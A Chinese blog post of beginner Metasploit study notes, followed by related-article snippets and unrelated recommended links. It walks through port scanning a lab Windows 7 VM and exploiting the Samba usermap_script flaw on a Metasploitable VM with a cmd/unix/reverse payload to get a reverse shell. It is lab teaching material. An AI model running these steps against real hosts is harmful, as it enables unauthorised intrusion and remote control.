Metasploit学习笔记(一)
1.更新
apt-get update:更新源
apt-get upgrade:更新软件包
apt-get dist-upgrade:升级系统
2. Metasploit基础
2.1专业名词
Auxiliaries(辅助模块) 扫描,嗅探,指纹识别
Exploit(漏洞利用模块) 针对漏洞进行攻击
Payload:目标被渗透之后的完成实际攻击功能的代码如添加一个用户,关机等等
Post(后期渗透模块): 后渗透的一些攻击:获取敏感信息,实现天半攻击等
Encoders:免杀,混淆
2.2 渗透步骤
扫描目标主机,寻找漏洞
选择并配置一个Exploit
选择并配置一个Payload
选择一个Encoders
渗透攻击
3. 主机扫描
ip 开放端口,可用服务等
3.1 使用Auxiliary进行端口扫描
search portscan 搜索可用的扫描器
use 使用该模块,可以输入全名,也可以输入序号(选用tcp扫描器)
show options 显示需要设置的参数,required为yes的为必须包含的实际的值

RHOSTS:待扫描的ip PORTS:扫描端口范围 THREADS:扫描线程
set进行设置参数,unset取消参数的设置
以本地搭建好的一个win7虚拟机为例(ip 192.168.21.131)

run或exploit进行扫描

结果:25 110端口显示开放(1-1000)
别的扫描模块待测试,互联网上也有人列举出了一些常用的扫描模块
3.2 使用nmap扫描
msf下直接nmap

两次扫描均没什么结果
下面以 Metasploitable 虚拟机演示
安装: https://www.zhaosimeng.cn/ctcs/95.html
ip:192.168.21.132
4.0 漏洞利用
扫描信息 nmap -sV 192.168.21.132

目标主机上存在Samba3.x服务(对其进行攻击)
search samba
use 13 (13为excellent)

show payloads并选用一款Linux下的payload

set payload cmd/unix/reverse


show options

然后run/exploit(中间虚拟机出现了点问题ip变为192.168.21.133)

如图反弹一个shell
Metasploit学习笔记(一)的更多相关文章
- metasploit 学习笔记-VULNERABILITY SCANNING
使用漏洞扫描器会在网络上产生大量流量,因此如果你不希望被发现踪迹时,不要使用漏洞扫描器。 The Basic Vulnerability Scan 漏洞扫描器的质量很大程度上取决于它自带的漏洞特征库。 ...
- Metasploit学习笔记之——情报搜集
1.情报搜集 1.1外围信息搜索 1.1.1通过DNS和IP地址挖掘目标网络信息 (1)whois域名注冊信息查询(BT5.kali专有):root@kali:~# whois testfire.ne ...
- Metasploit学习笔记(博主推荐)
不多说,直接上干货! 连接后台的数据库,当然不是必须品. 连接数据库的好处:1.可以攻击和扫描的结果,保存起来 2.将一些搜索结果做个缓存 默认数据库是postgresql. 同时要注意的是 ...
- Metasploit学习笔记
原创博客,转载请注出处! 各位看官可参看——Metasploit实验操作 1.打开msf msfconsole2.帮助选项: msfconsole -h 显示在msf ...
- Metasploit学习笔记(一) Samba服务 usermap_script安全漏洞相关信息
一.Samba介绍 Samba是linux和unix系统上实现smb协议的一个免费软件,由客户机和服务器构成.SMB是一种在局域网上实现共享文件和打印机的协议.存在一个服务器,客户机通过该协议可以服务 ...
- Metasploit学习笔记——强大的Meterpreter
1. Meterpreter命令详解 1.1基本命令 使用Adobe阅读器渗透攻击实战案例打开的Meterpreter会话实验,靶机是WinXP.由于所有命令与书中显示一致,截图将书中命令记录下来. ...
- Metasploit学习笔记——社会工程学
1.社会工程学攻击案例——伪装木马 Linux命令终端输入命令msfvenom -l payloads用来列出攻击载荷,grep命令用来查询所需要的攻击载荷,条件是windows系统.要有回连至监听主 ...
- Metasploit学习笔记——客户端渗透攻击
1.浏览器渗透攻击实例——MS11-050安全漏洞 示例代码如下 msf > use windows/browser/ms11_050_mshtml_cobjectelement msf exp ...
- Metasploit学习笔记——网络服务渗透攻击
1.内存攻防技术 1.1缓冲区溢出漏洞机理 1.2栈溢出利用机理 1.3缓冲区溢出利用的限制条件 2.网络服务渗透攻击面 3. Windows服务渗透攻击实战案例——MS08-067安全漏洞 示例代码 ...
- Metasploit学习笔记——Web应用渗透技术
1.命令注入实例分析 对定V公司网站博客系统扫描可以发现,它们安装了zingiri-web-shop这个含有命令注入漏洞的插件,到www.exploit-db.com搜索,可以看到2011.11.13 ...
随机推荐
- MySQL:锁机制和隔离事务级别
在mysql中的锁看起来是很复杂的,因为有一大堆的东西和名词:排它锁,共享锁,表锁,页锁,间隙锁,意向排它锁,意向共享锁,行锁,读锁,写锁,乐观锁,悲观锁,死锁.这些名词有的博客又直接写锁的英文的简写 ...
- python fabric 练习记录
https://blog.csdn.net/freeking101/article/details/81103945 fabric 域名
- background-clip 和 background-origin 有什么区别? -[CSS] - [属性]
这两个属性在W3S上的示例,给人的感觉好像效果是一样的:
- Pyhton基本图形绘制
目前学习Python中,记录一些内容~ 以下为部分练习内容 1.Python蟒蛇绘制 1 #PythonDraw.py 2 import turtle as t #t作为turtle的别名:另一种方法 ...
- 字符串操作 — Google Guava
前言 Java 里字符串表示字符的不可变序列,创建后就不能更改.在我们日常的工作中,字符串的使用非常频繁,熟练的对其操作可以极大的提升我们的工作效率,今天要介绍的主角是 Google 开源的一个核心 ...
- (js描述的)数据结构[队列结构,优先级队列](3)
(js描述的)数据结构[队列结构](3) 一.队列结构的特点: 1.基于数组来实现,的一种受限的线性结构. 2.只允许在表头进行删除操作,在表尾进行插入操作. 3.先进先出(FIFO) 二.队列的一些 ...
- TP的where方法的使用
1.Thinkphp中where()条件的使用 总是有人觉得,thinkphp的where()就是写我要进行增加.查询.修改.删除数据的条件,很简单的,其实我想告诉你,where()是写条件语句的,但 ...
- 8.1 api概述及使用
api文件:JDK_API_1.6.CHM 1:打开帮助文档2:点击显示,找到索引,看到输入框3:你要学习什么内容,你就在框框里面输入什么内容 举例:Random4:看包 java.lang包下的类在 ...
- "字体图标"组件:<icon> —— 快应用组件库H-UI
 <import name="icon" src="../Common/ui/h-ui/basic/c_icon"></import> ...
- Loading纯JS
function showLoading() { document.getElementById("over").style.display = "block" ...